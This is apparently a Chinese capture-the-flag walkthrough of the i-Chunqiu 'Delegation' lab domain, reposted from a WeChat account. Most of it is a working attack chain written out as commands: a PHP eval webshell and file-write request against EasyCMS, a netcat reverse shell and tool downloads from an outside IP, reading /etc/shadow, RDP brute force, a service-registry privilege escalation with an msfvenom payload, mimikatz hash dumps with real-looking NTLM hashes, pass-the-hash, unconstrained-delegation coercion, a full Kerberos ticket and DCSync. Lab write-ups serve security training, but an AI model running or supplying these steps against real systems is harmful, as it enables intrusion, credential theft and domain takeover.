首先访问http://39.99.135.178/
发现是easycms,访问后台 /admin
账号和密码都是弱口令:admin 123456
模板GetShell,找到header.html文件,插入php一句话。
然后访问主页即可,因为他会包含模板文件。传入参数a进行命令执行。
也可以通过任意文件写入漏洞进行写入文件。
http://ip地址/index.php?case=template&act=save&admin_dir=admin&site=defaultPOST:sid=#data_d_.._d_.._d_.._d_11.php&slen=693&scontent= @eval($_POST[1]);
随后使用蚁剑连接,然后反弹shell。
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 43.137.19.241 3333 >/tmp/f
发现存在diff,可以使用diff读取敏感文件。
使用如下,通过diff读取flag。
diff --line-format=%L /dev/null /etc/shadow
读取flag,可以看到并且给出了提示。Here is the hint: WIN19Adrian
diff --line-format=%L /dev/null /home/flag/flag01.txt简单信息收集,发现存在172.22.0.0 B段地址。
我们将fscan下载到目标机器。
wget http://43.137.19.241:5000/fscan_amd64
./fscan_amd64 -h 172.22.4.0/24
如上图发现了ad这个账户,我们进行爆破。
首先挂上代理,这里采用NPS。
wget http://43.137.19.241:5000/npc./npc -server=43.137.19.241:8024 -vkey=23qm41udjudhnbu0 -type=tcp
这里需要配合rockyou.txt 字典进行爆破,这个字段位于位于/usr/share/wordlists文件夹中,它是没有解压的,所以需要先解压。
解压:
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz进行暴力破解,这里有一个密码一直在重置( babygirl1),我们尝试去登录。
proxychains4 hydra -l Adrian -P /usr/share/wordlists/rockyou.txt 172.22.4.45 rdp -vV
proxychains4 rdesktop 172.22.4.45
这里显示密码过期需要重置密码。我们这里将密码重置为Admin123..
可以看到我们拿到的是一台普通的本地用户。
我们目前需要提权拿到域用户以及本地的Administrator。
通过PrivescCheck.ps1发现可以篡改Chrome浏览器更新服务注册表进行提权
之所以能够提权是因为这个是系统服务,并且也是当前用户可以操控的
紧接着我们生成一个正向的MSF的木马文件。因为不出网所以需要使用正向的。
msfvenom -p windows/meterpreter/bind_tcp LPORT=3344 -f exe > aaa.exereg add HKLMSYSTEMCurrentControlSetServicesgupdate /v ImagePath /t REG_EXPAND_SZ /d "C:UsersAdrianDesktopaaa.exe"通过rdesktop将文件传输到目标服务器。
proxychains4 rdesktop 172.22.4.45 -u adrian -p Admin123.. -r disk:share=/home
可以看到成功反弹。
proxychains msfconsole
连接成功之后需要立刻迁移进程,要不然session会掉。
加载mimikatz,可以看到WIN19$是一个机器账户。并且也是域内的机器账户。
load kiwi 加载mimikatzcred_all 导出所有Hash
Username Domain NTLM SHA1-------- ------ ---- ----Adrian WIN19 283b022e27f25cd57ad5ebe1f468c04b b945edab59edbfa67346679a86d181e100f0a13cXIAORANG 825ac5db2b4656cfa1d0289ef4c7e7ae 8a13cbe778c2ef821402c4ce619cf6e36e28a2d1XIAORANG 5943c35371c96f19bda7b8e67d041727 5a4dc280e89974fdec8cf1b2b76399d26f39b8f8
查看flag.
获取用户凭证,可以看到得到了本地管理员的Hash。
lsa_dump_sam
我们通过psexec进行PTH,但是我们是无法登录,这里可以创建一个账户,然后加入到本地管理组里面,我这里是直接更改了Administrator的密码。
proxychains4 python3 psexec.py Administrator@172.22.4.45 -hashes :ba21c629d9fd56aff10c3e826323e6ab -codec gbk
我们通过msf上传AdFind.exe
但是我们发现是没有域用户的,只有一个域内机器账户,也就是说没有域用户的话Adfind查询不了。
所以我们需要通过mimikatz拉取一个域用户的cmd窗口。
这里的hash是我们上面通过msf抓出来的。
mimikatz.exe ""privilege::debug""sekurlsa::pth /user:WIN19$ /domain:"xiaorang.lab" /ntlm:825ac5db2b4656cfa1d0289ef4c7e7ae
如下我们现在通过net user /domain就可以执行了,刚才是不行的。
这里通过AdFind进行查询。
AdFind.exe -b "DC=XIAORANG,DC=LAB" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn可以看到我们这台WIN19这台机器设置了非约束委派,那么只要域控来访问我们的服务,就会在我们本地的lsass进程中缓存目标的TGT。
首先在WIN19本地用Rubeus.exe监控来自DC的TGT,这里的Rubeus.exe的版本需要是.net4.5的 3.5目标机器没有。
Rubeus.exe monitor /interval:1 /filteruser:DC01$、然后使用DFSCoerce来进行触发。
项目地址:https://github.com/Wh04m1001/DFSCoerce
python3 dfscoerce.py -u WIN19$ -hashes :825ac5db2b4656cfa1d0289ef4c7e7ae -d xiaorang.lab win19 172.22.4.7 #接受端使用ip成功率不高可以看到已经成功了,接下来请求票据即可。
Rubeus.exe ptt /ticket:doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD4aLDXPNabj4/yHdZVDo8iWsmH4gpebt5S5+39hw3beXMpb210xVuDwomcbwjgA83UNhqV9FlUMWKL8QvC/+hnq9eAK65lWoABBhRhH+ExFz6GSOoXD9KXRSbMtxpk80fUGBeGdKEk/5eMDgsH/AsgkCfbb68Cihb+MUxq3mhEbuKVzVeMTjN47EbATNI8apPWLRE+3g+YX74J7ZhzjVooKRU4uDsSRJQQbph0+UmgnctGuXYY6RP1jJCh+SP0M0NaN+Q0X04HuUqVfBSPv6daFx1UHPmiaonzA71GbJaZDyFPIpxW58VDJoOapq39B5DmJktc3xvjxZCcTqYY6YpJ8impr/Cj+yrMw5DtAUlGCmLeDxtF9Hms9MzORNBFH7VqHA9eeSZw0pzrcOrbLvwlsxbx+uSNZ4hoMaaztF0wQBUWNd4sKwnGdtgyzpcbdvYhXE6Qr4aq6i+F3RhXe4/2aWF4Svv2mER+793858i94HlSD/EXdrrvrQSe+VJ8nySAQzmZ3F6CtVg3IDzQu3gJfMw30G+cBI1dR90U1yGilZzhDd7VUDNKXZa8YEbPHtvEVFgPG+70y4Z3YV2uyysR6ZZhdZ6XYh8HfAnFfpy1Q2aMxd5STeMkBtCBe9P6V6aK6gibGlMzdq2zZpvTpqslylfD80GeQBFBscwWDi38zYkQDbfzVnWMiNFCxw1vS8rEhFU1xhclHCQxZCi9nxYsQhHax1zxadC+SX9QLbQmoi9Q00A+2zHVyBM5v/vi03HZzco7EHSbTYlmhlxErfn6WtJOOJyttTZb6rOJErGPZ5rnf9Fy1Tdw1KA8Rl/eINrJf/buX5IJmVvdYlwNONx5UG9E08G59m1LEm8boanPibUZYevEfYCPBXyZM0Hy6bXedd3xlZI6MkZbY7NSh0BCAPdXAddTr1dyV0+hiEJZ00zRiXgZJ16Zt7eyrgJP2bS+nzQU+Ao217S//0eUoFgqPUlKg9geLHyVR9+0QyjBCAPAt71Rrt7dGqVjA/Vb5xAEAiAuX2mmzm5bZ4BkUCZKogbawu2x6MXTDqakAnYWNi9riASz+Jlpc7+kt4G/xBrKLq6RMK65bZQUa6H+G9dil9Gj2TLXBzXNbmTc4q9K7enb5J77A4ioWQEdHYq9o3pfY1mqWMoC+faFcqFy/8jnzEuwyrq3dAz3fAjB2oxGDWRdLKtO+6X8DJxRpppT4MvjJYwpjY5zdRdEOyPE5cPNcOqihLHan323VK4MquKtep07kopmixG/YDIBrCcrPtAyGXTsIbPpjTsIAzHehYVx+LpeJSzRVp4fAei3acKsyplr12YGQI+XrGWHgK2+FrvseQLxJvU07uRHS6CMLPNl4ewX/u7yfBqpJnx616jI4Ta5xVV0vCWmDS8ZTjQ25e+uRyJL4sFknbhQHoS4bWKJvdoCMQWL0dMQsN/SHkAujgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCBUGxBxI6BRP9fAGYyeris2M5cZV0AvM53yU3rZceTVnqEOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDIzMDkwNDE0MTgzMVqmERgPMjAyMzA5MDUwMDE4MzFapxEYDzIwMjMwOTExMTQxODMxWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==
查看票据:
dcsync
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:xiaorangAdministrator" exit
紧接着使用wmiexec 上去读flag,这台是FILESERVER
proxychains python3 wmiexec.py xiaorang/Administrator@172.22.4.19 -hashes :4889f6553239ace1f7c47fa2c619c252
读取flag。
DC:
读取flag。
原文始发于微信公众号(Relay学安全):i春秋云镜之Delegation
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论